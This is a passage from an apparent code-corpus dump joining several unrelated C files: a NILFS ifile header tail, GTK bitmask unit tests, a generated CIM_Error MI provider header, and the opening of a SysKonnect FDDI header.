 * Map the on-disk inode with number @ino from the buffer @ibh into the
 * kernel address space and return a pointer to its nilfs_inode entry.
 * The page backing @ibh stays kmapped until nilfs_ifile_unmap_inode()
 * is called; callers must pair each map with an unmap.
 */
static inline struct nilfs_inode *
nilfs_ifile_map_inode(struct inode *ifile, ino_t ino, struct buffer_head *ibh)
{
	void *kaddr = kmap(ibh->b_page);
	return nilfs_palloc_block_get_entry(ifile, ino, ibh, kaddr);
}

/*
 * Release the mapping created by nilfs_ifile_map_inode().  @ifile and
 * @ino are unused here but kept for symmetry with the map function.
 */
static inline void nilfs_ifile_unmap_inode(struct inode *ifile, ino_t ino,
					   struct buffer_head *ibh)
{
	kunmap(ibh->b_page);
}

int nilfs_ifile_create_inode(struct inode *, ino_t *, struct buffer_head **);
int nilfs_ifile_delete_inode(struct inode *, ino_t);
int nilfs_ifile_get_inode_block(struct inode *, ino_t, struct buffer_head **);

int nilfs_ifile_read(struct super_block *sb, struct nilfs_root *root,
		     size_t inode_size, struct nilfs_inode *raw_inode,
		     struct inode **inodep);

#endif	/* _NILFS_IFILE_H */
{ "language": "C" }
/* GtkRBTree tests.
 *
 * Copyright (C) 2011, Red Hat, Inc.
 * Authors: Benjamin Otte <otte@gnome.org>
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library. If not, see <http://www.gnu.org/licenses/>.
 */

#include <locale.h>

#include "../../gtk/gtkbitmaskprivate.h"

#include <string.h>

/* how often we run the random tests */
#define N_RUNS 20

/* how many tries we do in our random tests */
#define N_TRIES 100

/* the maximum index we use for bitmask values */
#define MAX_INDEX 1000

/* UTILITIES */

/* Builds a bitmask from a string of '0'/'1' characters; the leftmost
 * character of the string is the highest bit index. */
static GtkBitmask *
gtk_bitmask_new_parse (const char *string)
{
  guint i, length;
  GtkBitmask *mask;

  length = strlen (string);
  mask = _gtk_bitmask_new ();

  for (i = 0; i < length; i++)
    {
      if (string[i] == '0')
        mask = _gtk_bitmask_set (mask, length - i - 1, FALSE);
      else if (string[i] == '1')
        mask = _gtk_bitmask_set (mask, length - i - 1, TRUE);
      else
        g_assert_not_reached ();
    }

  return mask;
}

/* Asserts two bitmasks are equal, printing both on mismatch. */
#define assert_cmpmasks(mask,other) G_STMT_START { \
  if (G_UNLIKELY (!_gtk_bitmask_equals (mask, other))) \
    { \
      char *mask_string = _gtk_bitmask_to_string (mask); \
      char *other_string = _gtk_bitmask_to_string (other); \
      char *msg = g_strdup_printf ("%s (%s) != %s (%s)", \
                                   G_STRINGIFY (mask), mask_string, \
                                   G_STRINGIFY (other), other_string); \
      g_assertion_message (G_LOG_DOMAIN, __FILE__, __LINE__, G_STRFUNC, msg); \
      g_free (msg); \
      g_free (mask_string); \
      g_free (other_string); \
    } \
}G_STMT_END

/* Hardcoded fixtures chosen to straddle the 31/32/63/64/65-bit
 * boundaries of the inline-vs-allocated bitmask representation. */
static const char *tests[] = {
  "0",
  "1",
  "1000000000000000000000000000000",
  "10000000000000000000000000000000",
  "100000000000000000000000000000000000000000000000000000000000000",
  "1000000000000000000000000000000000000000000000000000000000000000",
  "10000000000000000000000000000000000000000000000000000000000000000",
  "1010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010101010",
  "1000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000100001000010000",
  "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"
};

/* Parsed versions of the fixtures above, filled in by create_masks(). */
static GtkBitmask *masks[G_N_ELEMENTS (tests)];

/* TEST */

/* to_string() must round-trip the original fixture strings. */
static void
test_to_string (void)
{
  guint i;
  char *to_string;

  for (i = 0; i < G_N_ELEMENTS (tests); i++)
    {
      to_string = _gtk_bitmask_to_string (masks[i]);
      g_assert_cmpstr (to_string, ==, tests[i]);
      g_free (to_string);
    }
}

/* Only fixture 0 ("0") is the empty mask. */
static void
test_is_empty (void)
{
  guint i;

  for (i = 0; i < G_N_ELEMENTS (tests); i++)
    {
      g_assert_cmpint (_gtk_bitmask_is_empty (masks[i]), ==, i == 0);
    }
}

/* Fixtures are pairwise distinct; equality holds only on the diagonal. */
static void
test_equals (void)
{
  guint i, j;

  for (i = 0; i < G_N_ELEMENTS (tests); i++)
    {
      for (j = 0; j < G_N_ELEMENTS (tests); j++)
        {
          g_assert_cmpint (_gtk_bitmask_equals (masks[i], masks[j]), ==, i == j);
        }
    }
}

/* Randomly perturbs a copy, then restores every touched bit from the
 * original; the result must equal the original again. */
static void
test_set (void)
{
  guint i, j;
  guint indexes[N_TRIES];
  GtkBitmask *copy;
  const GtkBitmask *mask;

  for (i = 0; i < N_RUNS; i++)
    {
      mask = masks[g_test_rand_int_range (0, G_N_ELEMENTS (tests))];
      copy = _gtk_bitmask_copy (mask);

      for (j = 0; j < N_TRIES; j++)
        {
          indexes[j] = g_test_rand_int_range (0, MAX_INDEX);
          copy = _gtk_bitmask_set (copy, indexes[j], g_test_rand_bit ());
        }

      for (j = 0; j < N_TRIES; j++)
        {
          copy = _gtk_bitmask_set (copy, indexes[j], _gtk_bitmask_get (mask, indexes[j]));
        }

      assert_cmpmasks (copy, mask);
      _gtk_bitmask_free (copy);
    }
}

/* Scatters random bits into two masks and checks that their union (in
 * both argument orders) matches the mask of all set bits. */
static void
test_union (void)
{
  GtkBitmask *left, *right, *expected;
  guint run, try, n_tries;

  for (run = 0; run < N_RUNS; run++)
    {
      left = _gtk_bitmask_new ();
      right = _gtk_bitmask_new ();
      expected = _gtk_bitmask_new ();

      n_tries = g_test_perf () ? N_TRIES : g_test_rand_int_range (0, N_TRIES);
      for (try = 0; try < n_tries; try++)
        {
          guint id = g_test_rand_int_range (0, MAX_INDEX);

          if (g_test_rand_bit ())
            left = _gtk_bitmask_set (left, id, TRUE);
          else
            right = _gtk_bitmask_set (right, id, TRUE);

          expected = _gtk_bitmask_set (expected, id, TRUE);
        }

      left = _gtk_bitmask_union (left, right);
      right = _gtk_bitmask_union (right, left);

      assert_cmpmasks (left, expected);
      assert_cmpmasks (right, expected);
      _gtk_bitmask_free (left);
      _gtk_bitmask_free (right);
      _gtk_bitmask_free (expected);
    }
}

/* Random intersection test: also verifies _gtk_bitmask_intersects()
 * is symmetric and agrees with emptiness of the actual intersection. */
static void
test_intersect (void)
{
  GtkBitmask *left, *right, *expected;
  guint run, try;
  gboolean intersects;

  for (run = 0; run < N_RUNS; run++)
    {
      left = _gtk_bitmask_new ();
      right = _gtk_bitmask_new ();
      expected = _gtk_bitmask_new ();

      for (try = 0; try < N_TRIES; try++)
        {
          guint id = g_test_rand_int_range (0, MAX_INDEX);
          gboolean set = g_test_rand_bit ();

          if (g_test_rand_bit ())
            {
              left = _gtk_bitmask_set (left, id, set);
              expected = _gtk_bitmask_set (expected, id, set ? _gtk_bitmask_get (right, id) : 0);
            }
          else
            {
              right = _gtk_bitmask_set (right, id, set);
              expected = _gtk_bitmask_set (expected, id, set ? _gtk_bitmask_get (left, id) : 0);
            }
        }

      intersects = _gtk_bitmask_intersects (left, right);
      g_assert_cmpint (intersects, ==, _gtk_bitmask_intersects (right, left));
      g_assert_cmpint (intersects, !=, _gtk_bitmask_is_empty (expected));

      left = _gtk_bitmask_intersect (left, right);
      right = _gtk_bitmask_intersect (right, left);

      assert_cmpmasks (left, expected);
      assert_cmpmasks (right, expected);

      _gtk_bitmask_free (left);
      _gtk_bitmask_free (right);
      _gtk_bitmask_free (expected);
    }
}

/* Computes the expected intersection character-by-character from the
 * fixture strings (aligned at their low ends) and compares. */
static void
test_intersect_hardcoded (void)
{
  GtkBitmask *left, *right, *intersection, *expected;
  const char *left_str, *right_str;
  guint left_len, right_len;
  guint i, l, r;

  for (l = 0; l < G_N_ELEMENTS (tests); l++)
    {
      for (r = 0; r < G_N_ELEMENTS (tests); r++)
        {
          left = masks[l];
          right = masks[r];
          left_str = tests[l];
          right_str = tests[r];
          left_len = strlen (tests[l]);
          right_len = strlen (tests[r]);

          expected = _gtk_bitmask_new ();
          if (left_len > right_len)
            left_str += left_len - right_len;
          if (right_len > left_len)
            right_str += right_len - left_len;
          i = MIN (right_len, left_len);
          while (i--)
            {
              expected = _gtk_bitmask_set (expected, i, left_str[0] == '1' && right_str[0] == '1');
              right_str++;
              left_str++;
            }

          intersection = _gtk_bitmask_intersect (_gtk_bitmask_copy (left), right);

          assert_cmpmasks (intersection, expected);
          g_assert_cmpint (_gtk_bitmask_is_empty (expected), ==, !_gtk_bitmask_intersects (left, right));

          _gtk_bitmask_free (intersection);
          _gtk_bitmask_free (expected);
        }
    }
}

/* Same scheme for subtraction: expected bit is "in left and not in
 * right"; bits of left above right's length survive unchanged. */
static void
test_subtract_hardcoded (void)
{
  GtkBitmask *left, *right, *subtracted, *expected;
  const char *left_str, *right_str;
  guint left_len, right_len;
  guint i, l, r;

  for (l = 0; l < G_N_ELEMENTS (tests); l++)
    {
      for (r = 0; r < G_N_ELEMENTS (tests); r++)
        {
          left = masks[l];
          right = masks[r];
          left_str = tests[l];
          right_str = tests[r];
          left_len = strlen (tests[l]);
          right_len = strlen (tests[r]);

          expected = _gtk_bitmask_new ();
          for (i = MIN (right_len, left_len); i < left_len; i++)
            {
              expected = _gtk_bitmask_set (expected, i, left_str[left_len - i - 1] == '1');
            }
          if (left_len > right_len)
            left_str += left_len - right_len;
          if (right_len > left_len)
            right_str += right_len - left_len;
          i = MIN (right_len, left_len);
          while (i--)
            {
              expected = _gtk_bitmask_set (expected, i, left_str[0] == '1' && right_str[0] == '0');
              right_str++;
              left_str++;
            }

          {
            char *sl = _gtk_bitmask_to_string (left);
            char *sr = _gtk_bitmask_to_string (right);
            g_test_message ("%s - %s\n", sl, sr);
            g_free (sl);
            g_free (sr);
          }
          subtracted = _gtk_bitmask_subtract (_gtk_bitmask_copy (left), right);

          assert_cmpmasks (subtracted, expected);

          _gtk_bitmask_free (subtracted);
          _gtk_bitmask_free (expected);
        }
    }
}

#define SWAP(_a, _b) G_STMT_START{ \
  guint _tmp = _a; \
  _a = _b; \
  _b = _tmp; \
}G_STMT_END

/* Builds the expected result of invert_range by flipping characters of
 * the fixture string directly, then compares with the real call. */
static void
test_invert_range_hardcoded (void)
{
  guint t, l, r, i;
  gsize r_len, l_len, ref_len;
  char *ref_str;
  GtkBitmask *bitmask, *ref;

  for (t = 0; t < G_N_ELEMENTS (tests); t++)
    {
      for (l = 0; l < G_N_ELEMENTS (tests); l++)
        {
          l_len = strlen (tests[l]);

          for (r = 0; r < G_N_ELEMENTS (tests); r++)
            {
              r_len = strlen (tests[r]);
              if (r_len < l_len)
                continue;

              ref_len = MAX (r_len, strlen (tests[t]));
              ref_str = g_strdup_printf ("%*s", (int) ref_len, tests[t]);
              for (i = 0; i < ref_len && ref_str[i] == ' '; i++)
                ref_str[i] = '0';
              for (i = l_len - 1; i < r_len; i++)
                {
                  ref_str[ref_len-i-1] = ref_str[ref_len-i-1] == '0' ? '1' : '0';
                }
              ref = gtk_bitmask_new_parse (ref_str);
              g_free (ref_str);

              bitmask = gtk_bitmask_new_parse (tests[t]);
              bitmask = _gtk_bitmask_invert_range (bitmask, l_len - 1, r_len);

              assert_cmpmasks (bitmask, ref);

              _gtk_bitmask_free (bitmask);
              _gtk_bitmask_free (ref);
            }
        }
    }
}

/* Random invert_range test: the intersection of two inverted ranges
 * must equal the inversion of the overlapping range; inverting it
 * again must yield the empty mask. */
static void
test_invert_range (void)
{
  GtkBitmask *left, *right, *intersection, *expected;
  guint run;
  guint left_start, left_end, right_start, right_end, start, end;

  for (run = 0; run < N_RUNS; run++)
    {
      left = _gtk_bitmask_new ();
      right = _gtk_bitmask_new ();
      expected = _gtk_bitmask_new ();

      left_start = g_test_rand_int_range (0, MAX_INDEX);
      left_end = g_test_rand_int_range (0, MAX_INDEX);
      if (left_start > left_end)
        SWAP (left_start, left_end);
      right_start = g_test_rand_int_range (0, MAX_INDEX);
      right_end = g_test_rand_int_range (0, MAX_INDEX);
      if (right_start > right_end)
        SWAP (right_start, right_end);
      start = MAX (left_start, right_start);
      end = MIN (left_end, right_end);

      if (left_start != left_end)
        left = _gtk_bitmask_invert_range (left, left_start, left_end);
      if (right_start != right_end)
        right = _gtk_bitmask_invert_range (right, right_start, right_end);
      if (start < end)
        expected = _gtk_bitmask_invert_range (expected, start, end);

      intersection = _gtk_bitmask_copy (left);
      intersection = _gtk_bitmask_intersect (intersection, right);

      assert_cmpmasks (intersection, expected);

      if (start < end)
        expected = _gtk_bitmask_invert_range (expected, start, end);

      g_assert_cmpint (_gtk_bitmask_is_empty (expected), ==, TRUE);

      _gtk_bitmask_free (left);
      _gtk_bitmask_free (right);
      _gtk_bitmask_free (intersection);
      _gtk_bitmask_free (expected);
    }
}

/* SETUP & RUNNING */

/* Parses all fixture strings into the global masks[] array. */
static void
create_masks (void)
{
  guint i;

  for (i = 0; i < G_N_ELEMENTS (tests); i++)
    masks[i] = gtk_bitmask_new_parse (tests[i]);
}

/* Frees the global masks[] array. */
static void
free_masks (void)
{
  guint i;

  for (i = 0; i < G_N_ELEMENTS (tests); i++)
    {
      _gtk_bitmask_free (masks[i]);
      masks[i] = NULL;
    }
}

int
main (int argc, char *argv[])
{
  int result;

  g_test_init (&argc, &argv, NULL);
  setlocale (LC_ALL, "C");

  create_masks ();

  g_test_add_func ("/bitmask/to_string", test_to_string);
  g_test_add_func ("/bitmask/is_empty", test_is_empty);
  g_test_add_func ("/bitmask/equals", test_equals);
  g_test_add_func ("/bitmask/set", test_set);
  g_test_add_func ("/bitmask/union", test_union);
  g_test_add_func ("/bitmask/intersect", test_intersect);
  g_test_add_func ("/bitmask/intersect_hardcoded", test_intersect_hardcoded);
  g_test_add_func ("/bitmask/subtract_hardcoded", test_subtract_hardcoded);
  g_test_add_func ("/bitmask/invert_range", test_invert_range);
  g_test_add_func ("/bitmask/invert_range_hardcoded", test_invert_range_hardcoded);

  result = g_test_run ();

  free_masks ();

  return result;
}
{ "language": "C" }
/* @migen@ */
/*
**==============================================================================
**
** WARNING: THIS FILE WAS AUTOMATICALLY GENERATED. PLEASE DO NOT EDIT.
**
**==============================================================================
*/
/* NOTE(review): generated MI provider header for the CIM_Error class.
 * Change the source MOF / generator, not this file; the comments below were
 * added for review readability only. */
#ifndef _CIM_Error_h
#define _CIM_Error_h

#include <MI.h>

/*
**==============================================================================
**
** CIM_Error [CIM_Error]
**
** Keys:
**
**==============================================================================
*/

/* Instance layout: the embedded MI_Instance header must stay first; the
 * property fields that follow are in schema order.  The numeric indices used
 * by the Set*/SetPtr*/Clear* accessors below (0..14) correspond to a
 * property's position in this struct. */
typedef struct _CIM_Error
{
    MI_Instance __instance;
    /* CIM_Error properties */
    MI_ConstUint16Field ErrorType;
    MI_ConstStringField OtherErrorType;
    MI_ConstStringField OwningEntity;
    MI_ConstStringField MessageID;
    MI_ConstStringField Message;
    MI_ConstStringAField MessageArguments;
    MI_ConstUint16Field PerceivedSeverity;
    MI_ConstUint16Field ProbableCause;
    MI_ConstStringField ProbableCauseDescription;
    MI_ConstStringAField RecommendedActions;
    MI_ConstStringField ErrorSource;
    MI_ConstUint16Field ErrorSourceFormat;
    MI_ConstStringField OtherErrorSourceFormat;
    MI_ConstUint32Field CIMStatusCode;
    MI_ConstStringField CIMStatusCodeDescription;
}
CIM_Error;

/* Reference / array wrapper types used by the generated provider plumbing. */
typedef struct _CIM_Error_Ref
{
    CIM_Error* value;
    MI_Boolean exists;
    MI_Uint8 flags;
}
CIM_Error_Ref;

typedef struct _CIM_Error_ConstRef
{
    MI_CONST CIM_Error* value;
    MI_Boolean exists;
    MI_Uint8 flags;
}
CIM_Error_ConstRef;

typedef struct _CIM_Error_Array
{
    struct _CIM_Error** data;
    MI_Uint32 size;
}
CIM_Error_Array;

typedef struct _CIM_Error_ConstArray
{
    struct _CIM_Error MI_CONST* MI_CONST* data;
    MI_Uint32 size;
}
CIM_Error_ConstArray;

typedef struct _CIM_Error_ArrayRef
{
    CIM_Error_Array value;
    MI_Boolean exists;
    MI_Uint8 flags;
}
CIM_Error_ArrayRef;

typedef struct _CIM_Error_ConstArrayRef
{
    CIM_Error_ConstArray value;
    MI_Boolean exists;
    MI_Uint8 flags;
}
CIM_Error_ConstArrayRef;

/* Runtime type information for CIM_Error, defined in the generated .c. */
MI_EXTERN_C MI_CONST MI_ClassDecl CIM_Error_rtti;

/* --- Lifecycle helpers ---------------------------------------------------- */

/* Initialize *self in place as a CIM_Error instance bound to 'context'. */
MI_INLINE MI_Result MI_CALL CIM_Error_Construct(
    CIM_Error* self,
    MI_Context* context)
{
    return MI_ConstructInstance(context, &CIM_Error_rtti,
        (MI_Instance*)&self->__instance);
}

/* Deep-copy *self into a newly allocated instance (caller owns *newInstance). */
MI_INLINE MI_Result MI_CALL CIM_Error_Clone(
    const CIM_Error* self,
    CIM_Error** newInstance)
{
    return MI_Instance_Clone(
        &self->__instance, (MI_Instance**)newInstance);
}

/* TRUE if 'self' is a CIM_Error (or derived) instance. */
MI_INLINE MI_Boolean MI_CALL CIM_Error_IsA(
    const MI_Instance* self)
{
    MI_Boolean res = MI_FALSE;
    return MI_Instance_IsA(self, &CIM_Error_rtti, &res) == MI_RESULT_OK && res;
}

/* Release resources of a Construct'ed instance (storage not freed). */
MI_INLINE MI_Result MI_CALL CIM_Error_Destruct(CIM_Error* self)
{
    return MI_Instance_Destruct(&self->__instance);
}

/* Destruct and free a Clone'd (heap) instance. */
MI_INLINE MI_Result MI_CALL CIM_Error_Delete(CIM_Error* self)
{
    return MI_Instance_Delete(&self->__instance);
}

/* Post this instance back to the client through 'context'. */
MI_INLINE MI_Result MI_CALL CIM_Error_Post(
    const CIM_Error* self,
    MI_Context* context)
{
    return MI_PostInstance(context, &self->__instance);
}

/* --- Property accessors ----------------------------------------------------
 * Pattern per property: Set_* copies the value, SetPtr_* stores a borrowed
 * pointer (MI_FLAG_BORROW — caller keeps ownership and must outlive the
 * instance), Clear_* resets the property to "not present". */

/* ErrorType (uint16, element 0): written directly into the field. */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorType(
    CIM_Error* self,
    MI_Uint16 x)
{
    ((MI_Uint16Field*)&self->ErrorType)->value = x;
    ((MI_Uint16Field*)&self->ErrorType)->exists = 1;
    return MI_RESULT_OK;
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorType(
    CIM_Error* self)
{
    memset((void*)&self->ErrorType, 0, sizeof(self->ErrorType));
    return MI_RESULT_OK;
}

/* OtherErrorType (string, element 1). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_OtherErrorType(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        1,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OtherErrorType(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        1,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OtherErrorType(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        1);
}

/* OwningEntity (string, element 2). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_OwningEntity(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        2,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OwningEntity(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        2,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OwningEntity(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        2);
}

/* MessageID (string, element 3). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_MessageID(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        3,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_MessageID(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        3,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_MessageID(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        3);
}

/* Message (string, element 4). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_Message(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        4,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_Message(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        4,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_Message(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        4);
}

/* MessageArguments (string array, element 5). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_MessageArguments(
    CIM_Error* self,
    const MI_Char** data,
    MI_Uint32 size)
{
    MI_Array arr;
    arr.data = (void*)data;
    arr.size = size;
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        5,
        (MI_Value*)&arr,
        MI_STRINGA,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_MessageArguments(
    CIM_Error* self,
    const MI_Char** data,
    MI_Uint32 size)
{
    MI_Array arr;
    arr.data = (void*)data;
    arr.size = size;
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        5,
        (MI_Value*)&arr,
        MI_STRINGA,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_MessageArguments(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        5);
}

/* PerceivedSeverity (uint16, element 6): written directly into the field. */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_PerceivedSeverity(
    CIM_Error* self,
    MI_Uint16 x)
{
    ((MI_Uint16Field*)&self->PerceivedSeverity)->value = x;
    ((MI_Uint16Field*)&self->PerceivedSeverity)->exists = 1;
    return MI_RESULT_OK;
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_PerceivedSeverity(
    CIM_Error* self)
{
    memset((void*)&self->PerceivedSeverity, 0, sizeof(self->PerceivedSeverity));
    return MI_RESULT_OK;
}

/* ProbableCause (uint16, element 7): written directly into the field. */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_ProbableCause(
    CIM_Error* self,
    MI_Uint16 x)
{
    ((MI_Uint16Field*)&self->ProbableCause)->value = x;
    ((MI_Uint16Field*)&self->ProbableCause)->exists = 1;
    return MI_RESULT_OK;
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ProbableCause(
    CIM_Error* self)
{
    memset((void*)&self->ProbableCause, 0, sizeof(self->ProbableCause));
    return MI_RESULT_OK;
}

/* ProbableCauseDescription (string, element 8). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_ProbableCauseDescription(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        8,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_ProbableCauseDescription(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        8,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ProbableCauseDescription(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        8);
}

/* RecommendedActions (string array, element 9). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_RecommendedActions(
    CIM_Error* self,
    const MI_Char** data,
    MI_Uint32 size)
{
    MI_Array arr;
    arr.data = (void*)data;
    arr.size = size;
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        9,
        (MI_Value*)&arr,
        MI_STRINGA,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_RecommendedActions(
    CIM_Error* self,
    const MI_Char** data,
    MI_Uint32 size)
{
    MI_Array arr;
    arr.data = (void*)data;
    arr.size = size;
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        9,
        (MI_Value*)&arr,
        MI_STRINGA,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_RecommendedActions(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        9);
}

/* ErrorSource (string, element 10). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorSource(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        10,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_ErrorSource(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        10,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorSource(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        10);
}

/* ErrorSourceFormat (uint16, element 11): written directly into the field. */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_ErrorSourceFormat(
    CIM_Error* self,
    MI_Uint16 x)
{
    ((MI_Uint16Field*)&self->ErrorSourceFormat)->value = x;
    ((MI_Uint16Field*)&self->ErrorSourceFormat)->exists = 1;
    return MI_RESULT_OK;
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_ErrorSourceFormat(
    CIM_Error* self)
{
    memset((void*)&self->ErrorSourceFormat, 0, sizeof(self->ErrorSourceFormat));
    return MI_RESULT_OK;
}

/* OtherErrorSourceFormat (string, element 12). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_OtherErrorSourceFormat(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        12,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_OtherErrorSourceFormat(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        12,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_OtherErrorSourceFormat(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        12);
}

/* CIMStatusCode (uint32, element 13): written directly into the field. */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_CIMStatusCode(
    CIM_Error* self,
    MI_Uint32 x)
{
    ((MI_Uint32Field*)&self->CIMStatusCode)->value = x;
    ((MI_Uint32Field*)&self->CIMStatusCode)->exists = 1;
    return MI_RESULT_OK;
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_CIMStatusCode(
    CIM_Error* self)
{
    memset((void*)&self->CIMStatusCode, 0, sizeof(self->CIMStatusCode));
    return MI_RESULT_OK;
}

/* CIMStatusCodeDescription (string, element 14). */
MI_INLINE MI_Result MI_CALL CIM_Error_Set_CIMStatusCodeDescription(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        14,
        (MI_Value*)&str,
        MI_STRING,
        0);
}

MI_INLINE MI_Result MI_CALL CIM_Error_SetPtr_CIMStatusCodeDescription(
    CIM_Error* self,
    const MI_Char* str)
{
    return self->__instance.ft->SetElementAt(
        (MI_Instance*)&self->__instance,
        14,
        (MI_Value*)&str,
        MI_STRING,
        MI_FLAG_BORROW);
}

MI_INLINE MI_Result MI_CALL CIM_Error_Clear_CIMStatusCodeDescription(
    CIM_Error* self)
{
    return self->__instance.ft->ClearElementAt(
        (MI_Instance*)&self->__instance,
        14);
}

#endif /* _CIM_Error_h */
{ "language": "C" }
/******************************************************************************
 *
 * (C)Copyright 1998,1999 SysKonnect,
 * a business unit of Schneider & Koch & Co. Datensysteme GmbH.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * The information in this file is provided "AS IS" without warranty.
 *
 ******************************************************************************/

#ifndef _SKFBI_H_
#define _SKFBI_H_

/*
 * FDDI-Fx (x := {I(SA), P(CI)})
 *	address calculation & function defines
 */

/*--------------------------------------------------------------------------*/
